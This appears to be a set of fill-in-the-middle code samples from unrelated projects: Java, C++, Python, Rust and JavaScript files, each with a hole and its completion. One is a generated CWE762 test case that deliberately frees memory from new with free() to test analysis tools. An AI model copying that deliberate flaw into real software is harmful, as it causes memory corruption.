<|file_name|>FloatArray64.java<|end_file_name|><|fim▁begin|><|fim▁hole|>package bigarrays; /** * @author [email protected] * * Class for representing a float static array requiring address space larger than 32 bits. */ public class FloatArray64 { private static final int CHUNK_SIZE = 1024*1024*512; private long size; private float[][] data; public FloatArray64(long size) { this.size = size; if(size == 0) data = null; else { int chunks = (int)(size/CHUNK_SIZE); int remainder = (int)(size - ((long)chunks)*CHUNK_SIZE); data = new float[chunks+(remainder==0?0:1)][]; for(int idx=chunks; --idx>=0; ) data[idx] = new float[(int)CHUNK_SIZE]; if(remainder != 0) data[chunks] = new float[remainder]; } } public static int chunkSize() { return CHUNK_SIZE; } public float[] toArray() { if(this.data.length == 1) return this.data[0]; return null; } public float get(long index) { if(index < 0 || index >= size) throw new IndexOutOfBoundsException("Error attempting to access data element "+index+". Array is "+size+" elements long."); int chunk = (int)(index / CHUNK_SIZE); int offset = (int)(index - (((long)chunk) * CHUNK_SIZE)); return data[chunk][offset]; } public float[] getByChunk(int chunk) { if(chunk >= data.length) throw new IndexOutOfBoundsException("Error attempting to access chunk "+chunk+". Array is "+size+" elements long [" + data.length + " chunks]"); return data[chunk]; } public void set(long index, float b) { if(index<0 || index>=size) throw new IndexOutOfBoundsException("Error attempting to access data element "+index+". Array is "+size+" elements long."); int chunk = (int)(index/CHUNK_SIZE); int offset = (int)(index - (((long)chunk)*CHUNK_SIZE)); data[chunk][offset] = b; } public void set(int chunk, float[] b) { if(chunk >= data.length) throw new IndexOutOfBoundsException("Error attempting to access chunk "+chunk+". Array is "+size+" elements long [" + data.length + " chunks]"); data[chunk] = b; } public long size() { return this.size; } public IntArray64 toIntArray() { IntArray64 array = new IntArray64(this.size); for(long i = 0; i < size; i++) array.set(i, (int)this.get(i)); return array; } }<|fim▁end|>
<|file_name|>CWE762_Mismatched_Memory_Management_Routines__new_free_int64_t_21.cpp<|end_file_name|><|fim▁begin|>/* TEMPLATE GENERATED TESTCASE FILE Filename: CWE762_Mismatched_Memory_Management_Routines__new_free_int64_t_21.cpp Label Definition File: CWE762_Mismatched_Memory_Management_Routines__new_free.label.xml Template File: sources-sinks-21.tmpl.cpp */ /* * @description * CWE: 762 Mismatched Memory Management Routines * BadSource: Allocate data using new * GoodSource: Allocate data using malloc() * Sinks: * GoodSink: Deallocate data using delete * BadSink : Deallocate data using free() * Flow Variant: 21 Control flow: Flow controlled by value of a static global variable. All functions contained in one file. * * */ #include "std_testcase.h" namespace CWE762_Mismatched_Memory_Management_Routines__new_free_int64_t_21 { #ifndef OMITBAD /* The static variable below is used to drive control flow in the sink function */ static int badStatic = 0; static void badSink(int64_t * data) { if(badStatic) { /* POTENTIAL FLAW: Deallocate memory using free() - the source memory allocation function may * require a call to delete to deallocate the memory */ free(data); } } void bad() { int64_t * data; /* Initialize data*/ data = NULL; /* POTENTIAL FLAW: Allocate memory with a function that requires delete to free the memory */ data = new int64_t; badStatic = 1; /* true */ badSink(data); } #endif /* OMITBAD */ #ifndef OMITGOOD /* The static variables below are used to drive control flow in the sink functions. */ static int goodB2G1Static = 0; static int goodB2G2Static = 0; static int goodG2bStatic = 0; /* goodB2G1() - use badsource and goodsink by setting the static variable to false instead of true */ static void goodB2G1Sink(int64_t * data) { if(goodB2G1Static) { /* INCIDENTAL: CWE 561 Dead Code, the code below will never run */ printLine("Benign, fixed string"); } else { /* FIX: Deallocate the memory using delete */ delete data; } } static void goodB2G1() { int64_t * data; /* Initialize data*/ data = NULL; /* POTENTIAL FLAW: Allocate memory with a function that requires delete to free the memory */ data = new int64_t; goodB2G1Static = 0; /* false */ goodB2G1Sink(data); } /* goodB2G2() - use badsource and goodsink by reversing the blocks in the if in the sink function */ static void goodB2G2Sink(int64_t * data) { if(goodB2G2Static) { /* FIX: Deallocate the memory using delete */ delete data; } } static void goodB2G2() { int64_t * data; /* Initialize data*/ data = NULL; /* POTENTIAL FLAW: Allocate memory with a function that requires delete to free the memory */ data = new int64_t; goodB2G2Static = 1; /* true */ goodB2G2Sink(data); } /* goodG2B() - use goodsource and badsink */ static void goodG2BSink(int64_t * data) { if(goodG2bStatic) { /* POTENTIAL FLAW: Deallocate memory using free() - the source memory allocation function may * require a call to delete to deallocate the memory */ free(data); } } static void goodG2B() { int64_t * data; /* Initialize data*/ data = NULL; /* FIX: Allocate memory from the heap using malloc() */ data = (int64_t *)malloc(100*sizeof(int64_t)); goodG2bStatic = 1; /* true */ goodG2BSink(data); } void good() { goodB2G1(); goodB2G2(); goodG2B(); } #endif /* OMITGOOD */ } /* close namespace */ /* Below is the main(). It is only used when building this testcase on its own for testing or for building a binary to use in testing binary analysis tools. It is not used when compiling all the testcases as one application, which is how source code analysis tools are tested. 
*/ #ifdef INCLUDEMAIN using namespace CWE762_Mismatched_Memory_Management_Routines__new_free_int64_t_21; /* so that we can use good and bad easily */ int main(int argc, char * argv[]) { /* seed randomness */ srand( (unsigned)time(NULL) ); #ifndef OMITGOOD <|fim▁hole|>#endif /* OMITGOOD */ #ifndef OMITBAD printLine("Calling bad()..."); bad(); printLine("Finished bad()"); #endif /* OMITBAD */ return 0; } #endif<|fim▁end|>
printLine("Calling good()..."); good(); printLine("Finished good()");
<|file_name|>deploy.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python3 import sys, os, shutil from os import path from urllib.request import pathname2url import subprocess from subprocess import call import sys import re import zipfile import config os.chdir(config.root_dir) SUPPORTED_OPERATING_SYSTEMS = ('windows_x64', 'linux_x64', 'mac')#, 'linux-arm32', 'linux-arm64') def make_dir(dir_path): """ make_dir(dir_path) creates a directory if it does not already exist, including parent directories. dir_path - directory to create """ if not path.exists(dir_path): os.makedirs(dir_path) def make_parent_dir(file_path): """ make_parent_dir(file_path) Creates the parent directory for the specified filepath if it does not already exist. file_path - path to some file """ parent_dir = path.dirname(file_path) if parent_dir == '': # means parent is working directory<|fim▁hole|> os.makedirs(parent_dir) def _del(filepath): """ Deletes a file or recursively deletes a directory. Use with caution. """ if(path.isdir(filepath)): for f in os.listdir(filepath): _del(path.join(filepath,f)) os.rmdir(filepath) elif(path.exists(filepath)): os.remove(filepath) def del_file(filepath): """ del_file(filepath): Deletes a file or recursively deletes a directory. Use with caution. filepath - path to file or directory to delete """ if(path.isdir(filepath)): for f in os.listdir(filepath): _del(path.join(filepath,f)) os.rmdir(filepath) elif(path.exists(filepath)): os.remove(filepath) def del_contents(dirpath): """ del_contents(dirpath) Recursively deletes the contents of a directory, but not the directory itself dirpath - path to directory to clean-out """ if(path.isdir(dirpath)): for f in os.listdir(dirpath): del_file(path.join(dirpath,f)) def list_files(dirpath): """ list_filetree(dirpath) Returns a list of all files inside a directory (recursive scan) dirpath - filepath of directory to scan """ if(type(dirpath) == str): dir_list = [dirpath] else: dir_list = dirpath file_list = [] for _dir_ in dir_list: for base, directories, files in os.walk(_dir_): for f in files: file_list.append(path.join(base,f)) return file_list def safe_quote_string(text): """ safe_quote_string(text) returns the text in quotes, with escapes for any quotes in the text itself text - input text to quote returns: text in quotes with escapes """ if os.sep != '\\': text2 = text.replace('\\', '\\\\') text3 = text2.replace('"', '\\"') else: text3 = text.replace('\\', '/') # windows does not allow " in file names anyway return '"'+text3+'"' def copy_tree(file_list, src_root, dest_root): """ copy_tree(file_list, src_root, dest_root) Copies all files to directory dest_root (creating it if necessary), preserving the folder structure relative to src_root """ for f in file_list: rel_path = path.relpath(f, src_root) dst_path = path.join(dest_root, rel_path) make_parent_dir(dst_path) shutil.copy(f, dst_path) def zip_dir(dir_path, zip_path): print('\nzipping %s to %s\n' % (dir_path, zip_path)) with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf: # zipf is zipfile handle for root, dirs, files in os.walk(dir_path): for file in files: fname = path.basename(dir_path) src_file = path.join(root, file) dst_file = path.join(fname, path.relpath(src_file, dir_path) ) zipf.write(src_file, arcname=dst_file) # done # make dirs make_dir(config.local_cache_dir) make_dir(config.compile_dir) make_dir(config.jar_dir) make_dir(config.deploy_dir) make_dir(config.deploy_image_dir) make_dir(config.run_dir) make_dir(config.src_dir) make_dir(config.resource_dir) # clean 
del_contents(config.run_dir) del_contents(config.jar_dir) del_contents(config.compile_dir) del_contents(config.deploy_image_dir) del_contents(config.deploy_dir) # compile (with jmods) for release_OS in SUPPORTED_OPERATING_SYSTEMS: print('\n',release_OS,'\n') module_src_path = path.join(config.src_dir, config.module_name) if(release_OS == 'windows_x64'): #java_home = 'D:\\CCHall\\Documents\\Programming\\OpenJDK_Distros\\windows-x64\\jdk-13.0.1' jmod_dirs = [path.join('jmods','windows')] #[path.join(java_home,'jmods')] + config.jmod_dirs_windows_x64 elif(release_OS == 'linux_x64'): #java_home = 'D:\\CCHall\\Documents\\Programming\\OpenJDK_Distros\\linux-x64\\jdk-13.0.1' jmod_dirs = [path.join('jmods','linux')] #[path.join(java_home,'jmods')] + config.jmod_dirs_linux_x64 elif(release_OS == 'mac'): #java_home = 'D:\\CCHall\\Documents\\Programming\\OpenJDK_Distros\\osx-x64\\jdk-13.0.1' jmod_dirs = [path.join('jmods','mac')] #[path.join(java_home,'jmods')] + config.jmod_dirs_mac else: print('UNSUPPORTED OS: %s' % release_OS) arg_file = path.join(config.local_cache_dir, 'javac-args.txt') command_list = [] command_list += ['-encoding', 'utf8'] command_list += ['-d', config.compile_dir] command_list += ['--module-source-path', config.src_dir] command_list += ['--module', config.module_name] module_paths = jmod_dirs + [f for f in list_files(config.dependency_dirs) if str(f).endswith('.jar')] # a .jmod file is auto-discoverable by --module-path command_list += ['--module-path', os.pathsep.join(module_paths)] with open(arg_file, 'w') as fout: file_content = ' '.join(map(safe_quote_string, command_list)) fout.write(file_content) print('@%s: %s' % (arg_file, file_content)) call([config.javac_exec, '@'+str(arg_file)], cwd=config.root_dir) print() # need to copy resources separately resource_files = list_files(config.resource_dir) resource_files += [f for f in list_files(config.src_dir) if str(f).endswith('.java') == False] copy_tree( list_files(config.resource_dir), config.src_dir, config.compile_dir ) copy_tree( [f for f in list_files(module_src_path) if str(f).endswith('.java') == False], config.src_dir, config.compile_dir ) # jlink arg_file = path.join(config.local_cache_dir, 'jlink-args.txt') command_list = [] command_list += ['--module-path', os.pathsep.join(module_paths + [config.compile_dir])] command_list += ['--add-modules', config.module_name] image_dir = path.join(config.deploy_image_dir, release_OS, config.module_name) command_list += ['--launcher', 'launch=%s/%s' % (config.module_name, config.main_class)] command_list += ['--output', image_dir] with open(arg_file, 'w') as fout: file_content = ' '.join(map(safe_quote_string, command_list)) fout.write(file_content) print('@%s: %s' % (arg_file, file_content)) call([config.jlink_exec, '@'+str(arg_file)], cwd=config.root_dir) # launcher if release_OS == 'windows_x64': with open(path.join(image_dir, 'launch_%s.bat' % config.module_title),'w') as fout: fout.write('"%~dp0\\bin\\launch.bat"\r\n') if release_OS == 'linux_x64': with open(path.join(image_dir, 'launch_%s.sh' % config.module_title),'w') as fout: fout.write('#!/bin/bash\ncd "`dirname "$0"`"\n./bin/launch\n') if release_OS == 'mac': with open(path.join(image_dir, 'launch_%s.sh' % config.module_title),'w') as fout: fout.write('#!/bin/sh\ncd "`dirname "$0"`"\n./bin/launch\n') # package images named_dir = path.join(config.deploy_image_dir, release_OS, config.module_title) zip_file = path.join(config.deploy_image_dir, '%s_%s.zip' % (config.module_title, release_OS)) shutil.move(image_dir, 
named_dir)
zip_dir(dir_path=named_dir, zip_path=zip_file)<|fim▁end|>
        return
    if not path.isdir(parent_dir):
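For readability, splicing the completion above back into the <|fim▁hole|> gap of this deploy.py row yields the helper below; the line breaks and indentation are reconstructed by hand, and only the os/path imports already listed at the top of the row are assumed:

import os
from os import path

def make_parent_dir(file_path):
    """
    make_parent_dir(file_path)
    Creates the parent directory for the specified filepath if it does not already exist.
    file_path - path to some file
    """
    parent_dir = path.dirname(file_path)
    if parent_dir == '':
        # means parent is working directory
        return
    if not path.isdir(parent_dir):
        os.makedirs(parent_dir)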
<|file_name|>devices.rs<|end_file_name|><|fim▁begin|>use std::collections::HashSet; use std::collections::HashMap; use std::fmt; use winapi::shared::hidpi::{HIDP_BUTTON_CAPS, HIDP_CAPS, HIDP_VALUE_CAPS}; use winapi::um::winnt::HANDLE; use winapi::um::winuser::RID_DEVICE_INFO; #[derive(Clone)] pub struct MouseInfo { pub name: String, pub handle: HANDLE, pub serial: Option<String>, pub info: RID_DEVICE_INFO, } impl fmt::Debug for MouseInfo { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { f.debug_struct("Mouse Info") .field("name", &self.name) .field("handle", &self.handle) .field("serial", &self.serial) .finish() } } #[derive(Clone, Debug)] pub struct MouseDisplayInfo { pub name: String, pub serial: Option<String>, } impl From<MouseInfo> for MouseDisplayInfo { fn from(mouse: MouseInfo) -> Self { Self { name: mouse.name, serial: mouse.serial } } } #[derive(Clone)] pub struct KeyboardInfo { pub name: String, pub handle: HANDLE, pub serial: Option<String>, pub info: RID_DEVICE_INFO, } impl fmt::Debug for KeyboardInfo { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { f.debug_struct("Keyboard Info") .field("name", &self.name) .field("handle", &self.handle) .field("serial", &self.serial) .finish() } } #[derive(Clone, Debug)] pub struct KeyboardDisplayInfo { pub name: String, pub serial: Option<String>, } impl From<KeyboardInfo> for KeyboardDisplayInfo { fn from(keyboard: KeyboardInfo) -> Self { Self { name: keyboard.name, serial: keyboard.serial } } } #[derive(Clone)] pub struct JoystickInfo { pub name: String, pub handle: HANDLE, pub serial: Option<String>, pub info: RID_DEVICE_INFO, pub caps: HIDP_CAPS, pub button_caps: Vec<HIDP_BUTTON_CAPS>, pub value_caps: Vec<HIDP_VALUE_CAPS>, pub preparsed_data: Vec<u8>, pub state: JoystickState, pub is_360_controller: bool, } impl fmt::Debug for JoystickInfo { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { f.debug_struct("Joystick Info") .field("name", &self.name) .field("handle", &self.handle) .field("serial", &self.serial) .field("360 Controller?", &self.is_360_controller) .finish() } } #[derive(Clone, Debug)] pub struct JoystickDisplayInfo { pub name: String, pub serial: Option<String>, } impl From<JoystickInfo> for JoystickDisplayInfo { fn from(joystick: JoystickInfo) -> Self { Self { name: joystick.name, serial: joystick.serial } } } #[derive(Clone, Debug)] pub enum DeviceInfo { Mouse(MouseInfo), Keyboard(KeyboardInfo), Joystick(JoystickInfo), } /// Stores Names to All Raw Input Devices #[derive(Clone)] pub struct Devices { pub mice: Vec<MouseInfo>, pub keyboards: Vec<KeyboardInfo>, pub joysticks: Vec<JoystickInfo>, pub device_map: HashMap<HANDLE, usize>, pub original_device_map: HashMap<HANDLE, usize>, } <|fim▁hole|> mice: Vec::new(), keyboards: Vec::new(), joysticks: Vec::new(), device_map: HashMap::new(), original_device_map: HashMap::new(), } } } impl Devices { pub fn filter_device_map(&mut self, device_filter: HashSet<String>) { self.device_map = HashMap::new(); for (pos, mouse) in self.mice.iter().enumerate() { if device_filter.contains(&mouse.name) { self.device_map.insert(mouse.handle, pos); } } for (pos, keyboard) in self.keyboards.iter().enumerate() { if device_filter.contains(&keyboard.name) { self.device_map.insert(keyboard.handle, pos); } } for (pos, joystick) in self.joysticks.iter().enumerate() { if device_filter.contains(&joystick.name) { self.device_map.insert(joystick.handle, pos); } } } pub fn reset_device_map(&mut self) { self.device_map = self.original_device_map.clone(); } } /// Striped down 
version of devices fit for sharing across threads #[derive(Clone, Debug)] pub struct DevicesDisplayInfo { pub mice: Vec<MouseDisplayInfo>, pub keyboards: Vec<KeyboardDisplayInfo>, pub joysticks: Vec<JoystickDisplayInfo>, } impl From<Devices> for DevicesDisplayInfo { fn from(devices: Devices) -> Self { Self { mice: devices.mice.iter().cloned().map(|m| m.into()).collect(), keyboards: devices.keyboards.iter().cloned().map(|m| m.into()).collect(), joysticks: devices.joysticks.iter().cloned().map(|m| m.into()).collect() } } } #[derive(Clone, Debug)] pub struct JoystickState { pub button_states: Vec<bool>, pub axis_states: Axes, pub hatswitch: Option<HatSwitch>, pub raw_axis_states: RawAxes, } impl JoystickState { pub fn new( p_button_caps: Vec<HIDP_BUTTON_CAPS>, p_value_caps: Vec<HIDP_VALUE_CAPS>, ) -> JoystickState { unsafe { let mut button_states: Vec<bool> = Vec::new(); if p_button_caps.len() > 0 { let ref button_caps = p_button_caps[0]; let number_of_buttons = button_caps.u.Range().UsageMax - button_caps.u.Range().UsageMin + 1; for _ in 0..number_of_buttons { button_states.push(false); } } let mut axis_states = Axes::new(); let mut hatswitch: Option<HatSwitch> = None; for value_caps in p_value_caps { if value_caps.u.Range().UsageMin == 0x30 { axis_states.x = Some(0f64); } if value_caps.u.Range().UsageMin == 0x31 { axis_states.y = Some(0f64); } if value_caps.u.Range().UsageMin == 0x32 { axis_states.z = Some(0f64); } if value_caps.u.Range().UsageMin == 0x33 { axis_states.rx = Some(0f64); } if value_caps.u.Range().UsageMin == 0x34 { axis_states.ry = Some(0f64); } if value_caps.u.Range().UsageMin == 0x35 { axis_states.rz = Some(0f64); } if value_caps.u.Range().UsageMin == 0x36 { axis_states.slider = Some(0f64); } if value_caps.u.Range().UsageMin == 0x39 { hatswitch = Some(HatSwitch::Center); } } JoystickState { button_states: button_states, axis_states: axis_states, hatswitch: hatswitch, raw_axis_states: RawAxes::new(), } } } } #[derive(Clone, Debug)] pub struct Axes { pub x: Option<f64>, pub y: Option<f64>, pub z: Option<f64>, pub rx: Option<f64>, pub ry: Option<f64>, pub rz: Option<f64>, pub slider: Option<f64>, } impl Axes { pub fn new() -> Axes { Axes { x: None, y: None, z: None, rx: None, ry: None, rz: None, slider: None, } } } #[derive(Clone, Debug)] pub struct RawAxes { pub x: u32, pub y: u32, pub z: u32, pub rx: u32, pub ry: u32, pub rz: u32, pub slider: u32, } impl RawAxes { pub fn new() -> RawAxes { RawAxes { x: 0u32, y: 0u32, z: 0u32, rx: 0u32, ry: 0u32, rz: 0u32, slider: 0u32, } } } #[derive(Clone, Debug, PartialEq, Eq, Hash)] pub enum HatSwitch { Center, Up, UpRight, Right, DownRight, Down, DownLeft, Left, UpLeft, }<|fim▁end|>
impl Devices {
    pub fn new() -> Devices {
        Devices {
<|file_name|>HyperElasticPhaseFieldIsoDamage.C<|end_file_name|><|fim▁begin|>/****************************************************************/ /* MOOSE - Multiphysics Object Oriented Simulation Environment */ /* */ /* All contents are licensed under LGPL V2.1 */ /* See LICENSE for full restrictions */ /****************************************************************/ #include "HyperElasticPhaseFieldIsoDamage.h" template<> InputParameters validParams<HyperElasticPhaseFieldIsoDamage>() { InputParameters params = validParams<FiniteStrainHyperElasticViscoPlastic>(); params.addParam<bool>("numerical_stiffness", false, "Flag for numerical stiffness"); params.addParam<Real>("damage_stiffness", 1e-8, "Avoid zero after complete damage"); params.addParam<Real>("zero_tol", 1e-12, "Tolerance for numerical zero"); params.addParam<Real>("zero_perturb", 1e-8, "Perturbation value when strain value less than numerical zero"); params.addParam<Real>("perturbation_scale_factor", 1e-5, "Perturbation scale factor"); params.addRequiredCoupledVar("c", "Damage variable"); params.addClassDescription("Computes damaged stress and energy in the intermediate configuration assuming isotropy"); return params; } HyperElasticPhaseFieldIsoDamage::HyperElasticPhaseFieldIsoDamage(const InputParameters & parameters) : FiniteStrainHyperElasticViscoPlastic(parameters), _num_stiffness(getParam<bool>("numerical_stiffness")), _kdamage(getParam<Real>("damage_stiffness")), _zero_tol(getParam<Real>("zero_tol")), _zero_pert(getParam<Real>("zero_perturb")), _pert_val(getParam<Real>("perturbation_scale_factor")), _c(coupledValue("c")), _save_state(false), _G0(declareProperty<Real>(_base_name + "G0")), _dG0_dstrain(declareProperty<RankTwoTensor>(_base_name + "dG0_dstrain")), _dstress_dc(declarePropertyDerivative<RankTwoTensor>(_base_name + "stress", getVar("c", 0)->name())), _etens(LIBMESH_DIM) { } void HyperElasticPhaseFieldIsoDamage::computePK2StressAndDerivative() { computeElasticStrain(); _save_state = true; computeDamageStress(); _pk2[_qp] = _pk2_tmp; _save_state = false; if (_num_stiffness) computeNumStiffness();<|fim▁hole|> _dce_dfe.zero(); for (unsigned int i = 0; i < LIBMESH_DIM; ++i) for (unsigned int j = 0; j < LIBMESH_DIM; ++j) for (unsigned int k = 0; k < LIBMESH_DIM; ++k) { _dce_dfe(i, j, k, i) = _dce_dfe(i, j, k, i) + _fe(k, j); _dce_dfe(i, j, k, j) = _dce_dfe(i, j, k, j) + _fe(k, i); } _dpk2_dfe = _dpk2_dce * _dce_dfe; } void HyperElasticPhaseFieldIsoDamage::computeDamageStress() { Real lambda = _elasticity_tensor[_qp](0, 0, 1, 1); Real mu = _elasticity_tensor[_qp](0, 1, 0, 1); Real c = _c[_qp]; Real xfac = std::pow(1.0-c, 2.0) + _kdamage; std::vector<Real> w; RankTwoTensor evec; _ee.symmetricEigenvaluesEigenvectors(w, evec); for (unsigned int i = 0; i < LIBMESH_DIM; ++i) _etens[i].vectorOuterProduct(evec.column(i), evec.column(i)); Real etr = 0.0; for (unsigned int i = 0; i < LIBMESH_DIM; ++i) etr += w[i]; Real etrpos=(std::abs(etr)+etr)/2.0; Real etrneg=(std::abs(etr)-etr)/2.0; RankTwoTensor pk2pos, pk2neg; for (unsigned int i = 0; i < LIBMESH_DIM; ++i) { pk2pos += _etens[i] * (lambda * etrpos + 2.0 * mu * (std::abs(w[i]) + w[i])/2.0); pk2neg += _etens[i] * (lambda * etrneg + 2.0 * mu * (std::abs(w[i]) - w[i])/2.0); } _pk2_tmp = pk2pos * xfac - pk2neg; if (_save_state) { std::vector<Real> epos(LIBMESH_DIM); for (unsigned int i = 0; i < LIBMESH_DIM; ++i) epos[i] = (std::abs(w[i]) + w[i])/2.0; _G0[_qp] = 0.0; for (unsigned int i = 0; i < LIBMESH_DIM; ++i) _G0[_qp] += std::pow(epos[i], 2.0); _G0[_qp] *= mu; _G0[_qp] += 
lambda * std::pow(etrpos, 2.0)/2.0; _dG0_dee = pk2pos; _dpk2_dc = -pk2pos * (2.0 * (1.0-c)); } } void HyperElasticPhaseFieldIsoDamage::computeNumStiffness() { RankTwoTensor ee_tmp; for (unsigned int i = 0; i < LIBMESH_DIM; ++i) for (unsigned int j = i; j < LIBMESH_DIM; ++j) { Real ee_pert = _zero_pert; if (std::abs(_ee(i, j)) > _zero_tol) ee_pert = _pert_val * std::abs(_ee(i, j)); ee_tmp = _ee; _ee(i, j) += ee_pert; computeDamageStress(); for (unsigned int k = 0; k < LIBMESH_DIM; ++k) for (unsigned int l = 0; l < LIBMESH_DIM; ++l) { _dpk2_dee(k, l, i, j) = (_pk2_tmp(k, l) - _pk2[_qp](k, l))/ee_pert; _dpk2_dee(k, l, j, i) = (_pk2_tmp(k, l) - _pk2[_qp](k, l))/ee_pert; } _ee = ee_tmp; } } void HyperElasticPhaseFieldIsoDamage::computeQpJacobian() { FiniteStrainHyperElasticViscoPlastic::computeQpJacobian(); RankTwoTensor dG0_dce = _dee_dce.innerProductTranspose(_dG0_dee); RankTwoTensor dG0_dfe = _dce_dfe.innerProductTranspose(dG0_dce); RankTwoTensor dG0_df = _dfe_df.innerProductTranspose(dG0_dfe); _dG0_dstrain[_qp] = _df_dstretch_inc.innerProductTranspose(dG0_df); _dstress_dc[_qp] = _fe.mixedProductIkJl(_fe) * _dpk2_dc; }<|fim▁end|>
  if (_num_stiffness)
    _dpk2_dce = _dpk2_dee * _dee_dce;
<|file_name|>typedarray-prototype.js<|end_file_name|><|fim▁begin|>// Any copyright is dedicated to the Public Domain. // http://creativecommons.org/licenses/publicdomain/ //----------------------------------------------------------------------------- var BUGNUMBER = 565604; var summary = "Typed-array properties don't work when accessed from an object whose " + "prototype (or further-descended prototype) is a typed array"; print(BUGNUMBER + ": " + summary); /************** * BEGIN TEST * **************/ var o = Object.create(new Uint8Array(1)); assertEq(o.length, 1); var o2 = Object.create(o); assertEq(o2.length, 1); var VARIABLE_OBJECT = {}; var props = [ { property: "length", value: 1 }, { property: "byteLength", value: 1 }, { property: "byteOffset", value: 0 }, { property: "buffer", value: VARIABLE_OBJECT }, ]; for (var i = 0, sz = props.length; i < sz; i++) {<|fim▁hole|> var o = Object.create(new Uint8Array(1)); var v = o[p.property]; if (p.value !== VARIABLE_OBJECT) assertEq(o[p.property], p.value, "bad " + p.property + " (proto)"); var o2 = Object.create(o); if (p.value !== VARIABLE_OBJECT) assertEq(o2[p.property], p.value, "bad " + p.property + " (grand-proto)"); assertEq(o2[p.property], v, p.property + " mismatch"); } reportCompare(true, true);<|fim▁end|>
var p = props[i];
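Every row in this split follows the same layout: a <|file_name|> header, a <|fim▁begin|> prefix, a <|fim▁hole|> marker, the suffix, <|fim▁end|>, and then the target completion. A minimal Python sketch of how a row could be stitched back into the original file text; the helper name is illustrative, and it assumes the marker strings never occur inside the code itself:

FIM_BEGIN = "<|fim▁begin|>"
FIM_HOLE = "<|fim▁hole|>"
FIM_END = "<|fim▁end|>"

def splice_fim(prompt, completion):
    # drop the <|file_name|>...<|end_file_name|> header, then split around the hole
    body = prompt.split(FIM_BEGIN, 1)[1]
    prefix, rest = body.split(FIM_HOLE, 1)
    suffix = rest.split(FIM_END, 1)[0]
    return prefix + completion + suffix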
<|file_name|>list_filtering.js<|end_file_name|><|fim▁begin|>function changeQueryStr(name, value) { var query = window.location.search.substring(1), newQuery = '?', notFound = true, vars = query.split('&'); for (var i = 0; i < vars.length; i++) { var pair = vars[i].split('='); if (pair == '' || pair[0] == 'page') continue;<|fim▁hole|> if (pair[0] == name) { notFound = false; pair[1] = value; } if (pair[1].length > 0) { newQuery += pair[0] + '=' + pair[1] + '&'; } } if (notFound && value.length > 0) { newQuery += name + '=' + value; } else if (newQuery.length == 1) { newQuery = ''; } else { newQuery = newQuery.slice(0,-1); } var loc = window.location, ajaxurl = '/ajax' + loc.pathname + newQuery, newurl = loc.protocol + "//" + loc.host + loc.pathname + newQuery; $.get(ajaxurl).done(function(data){ $('#ajax-content').html(data); init_pagination(); }); window.history.pushState({path:newurl},'',newurl); } function init_filtering_stories(jQuery) { $('#filtering input').change(function(){ var input = $(this), name = input[0].name, value=input.val(); changeQueryStr(name, value); }); } function init_pagination(jQuery) { $('.pager a').on('click', function(e){ e.preventDefault(); var value = $(this).closest('li').data('pageNum'); if (value) changeQueryStr('page', String(value)); }); } $(document).ready(init_filtering_stories); $(document).ready(init_pagination);<|fim▁end|>
<|file_name|>test_python_2d_ns.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # -*- coding: utf-8 -*- """ test_python_2d_ns ---------------------------------- Tests for `python_2d_ns` module. """ import sys import unittest from python_2d_ns.python_2d_ns import * class TestPython_2d_ns(unittest.TestCase): #test x, y coordinates generated by function IC_coor #assume use 2 threads and rank==1 #y coordinate should be the same as serial code def test_IC_coor_y_coor(self): x, y, kx, ky, k2, k2_exp=IC_coor(64, 64, 32, 1, 1, 1, 2) self.assertTrue(y[3,0]==-32) self.assertTrue(y[3,5]==-27) #x coordinate for rank 2 should start from 0 def test_IC_coor_x_coor(self): x, y, kx, ky, k2, k2_exp=IC_coor(64, 64, 32, 1, 1, 1, 2)<|fim▁hole|> #generate kx, ky, assume 2 threads, rank==0 x, y, kx, ky, k2, k2_exp=IC_coor(32, 32, 16, 1, 1, 0, 2) Vxhat, Vyhat=IC_condition(1, 2, kx, ky, 32, 16) #this wavenumber should be zero self.assertTrue(Vyhat[2,5]==0) #this wavenumber should be non-zero self.assertTrue(Vxhat[14,14]==0.5j) #test dealiasing function, which will remove values in wavenumber >= Nx/3 def test_delias(self): #generate kx, ky, assume 2 threads, rank==1 Vxhat=zeros((Nx, Np), dtype=complex); Vyhat=zeros((Nx, Np), dtype=complex); Vxhat[:]=1 Vxhat, Vyhat=delias(Vxhat, Vyhat, Nx, Np, k2) #this should be zero self.assertTrue(Vxhat[Nx-1,Np-1]==0) self.assertTrue(Vyhat[Nx-1,Np-1]==0) #test FFT and IFFT. Take FFT and IFFT on array, it will transform back (with some numerical errors) def test_FFT(self): testa=zeros((Np, Ny), dtype=float); testahat=empty(( N, Np) , dtype = complex ) if rank==0: testa[2,0]=1 testa=ifftn_mpi(fftn_mpi(testa, testahat), testa) #after FFT and IFFT, this value should be the same if rank==0: self.assertTrue(testa[2,0]-1<0.0001) if __name__ == '__main__': sys.exit(unittest.main())<|fim▁end|>
#this coordinate should be 0 self.assertTrue(x[0,2]==0) #test initial condition, Taylor green forcing, test whether the value is given on specific wavenumber def test_IC_con(self):
<|file_name|>borrowed-unique-basic.rs<|end_file_name|><|fim▁begin|>// Copyright 2013-2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. // min-lldb-version: 310 // Gdb doesn't know about UTF-32 character encoding and will print a rust char as only // its numerical value. // compile-flags:-g // === GDB TESTS =================================================================================== // gdb-command:run // gdb-command:print *bool_ref // gdb-check:$1 = true // gdb-command:print *int_ref // gdb-check:$2 = -1 // gdb-command:print *char_ref // gdb-check:$3 = 97 // gdb-command:print/d *i8_ref // gdb-check:$4 = 68 // gdb-command:print *i16_ref // gdb-check:$5 = -16 // gdb-command:print *i32_ref // gdb-check:$6 = -32 // gdb-command:print *i64_ref // gdb-check:$7 = -64 // gdb-command:print *uint_ref // gdb-check:$8 = 1 // gdb-command:print/d *u8_ref // gdb-check:$9 = 100 // gdb-command:print *u16_ref // gdb-check:$10 = 16 // gdb-command:print *u32_ref // gdb-check:$11 = 32 // gdb-command:print *u64_ref // gdb-check:$12 = 64 // gdb-command:print *f32_ref // gdb-check:$13 = 2.5 // gdb-command:print *f64_ref // 